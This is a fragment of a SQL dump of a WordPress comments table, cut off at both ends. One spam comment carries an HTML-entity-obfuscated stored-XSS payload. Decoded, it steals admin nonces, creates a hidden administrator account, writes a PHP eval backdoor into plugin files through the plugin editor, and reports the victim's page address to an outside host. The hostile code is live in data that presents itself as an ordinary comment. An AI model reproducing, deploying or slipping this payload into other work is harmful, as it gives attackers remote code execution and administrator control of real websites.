&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#032;&#032;&#032;&#032;&#125;&#032;&#032;&#125;&#041;&#032;&#032;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#032;&#125;&#041;&#032;&#032;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#032;&#125;&#041;&#059;\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>', 0, '0', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko', '', 0, 0),
(147, 1, 'James', 'gqapwgoa@gmail.com', 'http://www.facebook.com/wraaaonte8lz', '220.213.228.173', '2015-11-10 16:05:39', '2015-11-10 16:05:39', 'Hi nice ar Gtrz<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"&#118;&#097;&#114;&#032;&#097;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#112;&#108;&#105;&#116;&#040;&#039;&#047;&#039;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#120;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#117;&#115;&#101;&#114;&#045;&#110;&#101;&#119;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#112;&#117;&#114;&#108;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#097;&#091;&#097;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#045;&#049;&#093;&#044;&#034;&#112;&#108;&#117;&#103;&#105;&#110;&#045;&#101;&#100;&#105;&#116;&#111;&#114;&#046;&#112;&#104;&#112;&#034;&#041;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#050;&#032;&#061;&#032;&#091;&#039;&#104;&#101;&#108;&#108;&#111;&#046;&#112;&#104;&#112;&#039;&#093;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#032;&#061;&#032;&#049;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#060;&#063;&#112;&#104;&#112;&#092;&#110;&#105;&#102;&#040;&#105;&#115;&#115;&#101;&#116;&#040;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#041;&#123;&#040;&#036;&#119;&#119;&#119;&#032;&#061;&#032;&#036;&#095;&#080;&#079;&#083;&#084;&#091;&#039;&#100;&#097;&#107;&#039;&#093;&#041;&#032;&#038;&#038;&#032;&#064;&#112;&#114;&#101;&#103;&#095;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#047;&#097;&#100;&#047;&#101;&#039;&#044;&#032;&#039;&#064;&#039;&#032;&#046;&#032;&#115;&#116;&#114;&#095;&#114;&#111;&#116;&#049;&#051;&#040;&#039;&#114;&#105;&#110;&#121;&#039;&#041;&#032;&#046;&#032;&#039;&#040;&#036;&#119;&#119;&#119;&#041;&#039;&#044;&#032;&#039;&#097;&#100;&#100;&#039;&#041;&#059;&#101;&#120;&#105;&#116;&#059;&#125;&#034;&#059;&#032;&#010;&#118;&#097;&#114;&#032;&#108;&#097;&#117;&#114;&#108;&#032;&#061;&#032;&#034;&#104;&#116;&#116;&#112;&#058;&#047;&#047;&#119;&#101;&#098;&#046;&#053;&#049;&#046;&#108;&#097;&#058;&#056;&#050;&#047;&#103;&#111;&#046;&#097;&#115;&#112;&#034;&#059;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#120;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#032;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#095;&#099;&#114;&#101;&#097;&#116;&#101;&#045;&#117;&#115;&#101;&#114;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#117;&#115;&#101;&#114;&#095;&#108;&#111;&#103;&#105;&#110;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#101;&#109;&#097;&#105;&#108;&#039;&#058;&#039;&#114;&#111;&#111;&#116;&#064;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#102;&#105;&#114;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#108;&#097;&#115;&#116;&#095;&#110;&#097;&#109;&#101;&#039;&#058;&#039;&#111;&#098;&#117;&#115;&#101;&#114;&#039;&#044;&#039;&#117;&#114;&#108;&#039;&#058;&#039;&#119;&#119;&#119;&#046;&#120;&#115;&#115;&#049;&#046;&#099;&#111;&#109;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#049;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#112;&#097;&#115;&#115;&#050;&#039;&#058;&#039;&#111;&#098;&#112;&#097;&#115;&#115;&#039;&#044;&#039;&#114;&#111;&#108;&#101;&#039;&#058;&#039;&#097;&#100;&#109;&#105;&#110;&#105;&#115;&#116;&#114;&#097;&#116;&#111;&#114;&#039;&#044;&#039;&#099;&#114;&#101;&#097;&#116;&#101;&#117;&#115;&#101;&#114;&#039;&#058;&#039;&#065;&#100;&#100;&#043;&#078;&#101;&#119;&#043;&#085;&#115;&#101;&#114;&#043;&#039;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#039;&#111;&#107;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#010;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#108;&#097;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#115;&#118;&#105;&#100;&#039;&#058;&#049;&#051;&#044;&#039;&#105;&#100;&#039;&#058;&#049;&#056;&#054;&#052;&#054;&#056;&#053;&#050;&#044;&#039;&#118;&#112;&#097;&#103;&#101;&#039;&#058;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#125;&#010;&#032;&#032;&#125;&#041;&#032;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#102;&#097;&#105;&#108;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#101;&#114;&#114;&#111;&#114;&#034;&#041;&#059;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#097;&#108;&#119;&#097;&#121;&#115;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#125;&#041;&#059;&#010;&#010;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#071;&#069;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#084;&#121;&#112;&#101;&#058;&#032;&#039;&#104;&#116;&#109;&#108;&#039;&#044;&#032;&#010;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#125;&#044;&#032;&#010;&#125;&#041;&#032;&#010;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#118;&#097;&#114;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#088;&#116;&#111;&#107;&#101;&#110;&#061;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#116;&#101;&#109;&#112;&#046;&#102;&#105;&#110;&#100;&#040;&#039;&#100;&#105;&#118;&#046;&#097;&#108;&#105;&#103;&#110;&#108;&#101;&#102;&#116;&#032;&#098;&#105;&#103;&#032;&#115;&#116;&#114;&#111;&#110;&#103;&#039;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#105;&#108;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#059;&#032;&#010;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#088;&#116;&#111;&#107;&#101;&#110;&#038;&#038;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#038;&#038;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#088;&#116;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#084;&#109;&#112;&#099;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#041;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#114;&#101;&#116;&#117;&#114;&#110;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#032;&#032;&#010;&#032;&#032;&#125;&#032;&#010;&#032;&#032;&#105;&#102;&#040;&#083;&#116;&#097;&#114;&#116;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#102;&#111;&#114;&#040;&#118;&#097;&#114;&#032;&#105;&#061;&#048;&#059;&#105;&#060;&#102;&#105;&#108;&#101;&#050;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#059;&#105;&#043;&#043;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#032;&#061;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#033;&#061;&#102;&#105;&#108;&#101;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#032;&#102;&#105;&#108;&#101;&#050;&#091;&#105;&#093;&#044;&#039;&#083;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#083;&#101;&#108;&#101;&#099;&#116;&#039;&#125;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#100;&#097;&#116;&#097;&#041;&#032;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#061;&#032;&#034;&#034;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#100;&#097;&#116;&#097;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#116;&#101;&#120;&#116;&#097;&#114;&#101;&#097;&#035;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#032;&#061;&#032;&#111;&#046;&#116;&#101;&#120;&#116;&#040;&#041;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#039;&#060;&#063;&#112;&#104;&#112;&#039;&#044;&#115;&#104;&#101;&#108;&#108;&#099;&#111;&#100;&#101;&#041;&#059;&#032;&#032;&#032;&#032;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#071;&#101;&#116;&#115;&#104;&#101;&#108;&#108;&#046;&#102;&#105;&#110;&#100;&#040;&#034;&#105;&#110;&#112;&#117;&#116;&#035;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#034;&#041;&#046;&#101;&#097;&#099;&#104;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#105;&#044;&#111;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#111;&#061;&#106;&#081;&#117;&#101;&#114;&#121;&#040;&#111;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#032;&#061;&#032;&#111;&#046;&#097;&#116;&#116;&#114;&#040;&#039;&#118;&#097;&#108;&#117;&#101;&#039;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#105;&#102;&#040;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#038;&#038;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#108;&#111;&#103;&#040;&#034;&#049;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#106;&#081;&#117;&#101;&#114;&#121;&#046;&#097;&#106;&#097;&#120;&#040;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#117;&#114;&#108;&#058;&#032;&#112;&#117;&#114;&#108;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#116;&#121;&#112;&#101;&#058;&#032;&#039;&#080;&#079;&#083;&#084;&#039;&#044;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#100;&#097;&#116;&#097;&#058;&#032;&#123;&#039;&#095;&#119;&#112;&#110;&#111;&#110;&#099;&#101;&#039;&#058;&#078;&#101;&#119;&#084;&#111;&#107;&#101;&#110;&#044;&#039;&#110;&#101;&#119;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#039;&#058;&#078;&#101;&#119;&#067;&#111;&#100;&#101;&#044;&#039;&#097;&#099;&#116;&#105;&#111;&#110;&#039;&#058;&#039;&#117;&#112;&#100;&#097;&#116;&#101;&#039;&#044;&#039;&#102;&#105;&#108;&#101;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#112;&#108;&#117;&#103;&#105;&#110;&#039;&#058;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&#044;&#039;&#115;&#117;&#098;&#109;&#105;&#116;&#039;&#058;&#039;&#085;&#112;&#100;&#097;&#116;&#101;&#043;&#070;&#105;&#108;&#101;&#039;&#125;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#125;&#041;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#046;&#100;&#111;&#110;&#101;&#040;&#102;&#117;&#110;&#099;&#116;&#105;&#111;&#110;&#040;&#041;&#123;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#118;&#097;&#114;&#032;&#116;&#101;&#109;&#112;&#032;&#061;&#032;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#115;&#117;&#098;&#115;&#116;&#114;&#105;&#110;&#103;&#040;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#105;&#110;&#100;&#101;&#120;&#079;&#102;&#040;&#039;&#119;&#112;&#045;&#097;&#100;&#109;&#105;&#110;&#039;&#041;&#044;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#108;&#101;&#110;&#103;&#116;&#104;&#041;&#059;&#032;&#010;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#032;&#099;&#111;&#110;&#115;&#111;&#108;&#101;&#046;&#105;&#110;&#102;&#111;&#040;&#039;&#087;&#101;&#098;&#115;&#104;&#101;&#108;&#108;&#65306;&#039;&#043;&#108;&#111;&#099;&#097;&#116;&#105;&#111;&#110;&#046;&#104;&#114;&#101;&#102;&#046;&#114;&#101;&#112;&#108;&#097;&#099;&#101;&#040;&#116;&#101;&#109;&#112;&#044;&#034;&#119;&#112;&#045;&#099;&#111;&#110;&#116;&#101;&#110;&#116;&#047;&#112;&#108;&#117;&#103;&#105;&#110;&#115;&#047;&#034;&#043;&#102;&#105;&#108;&#101;&#110;&#097;&#109;&#101;&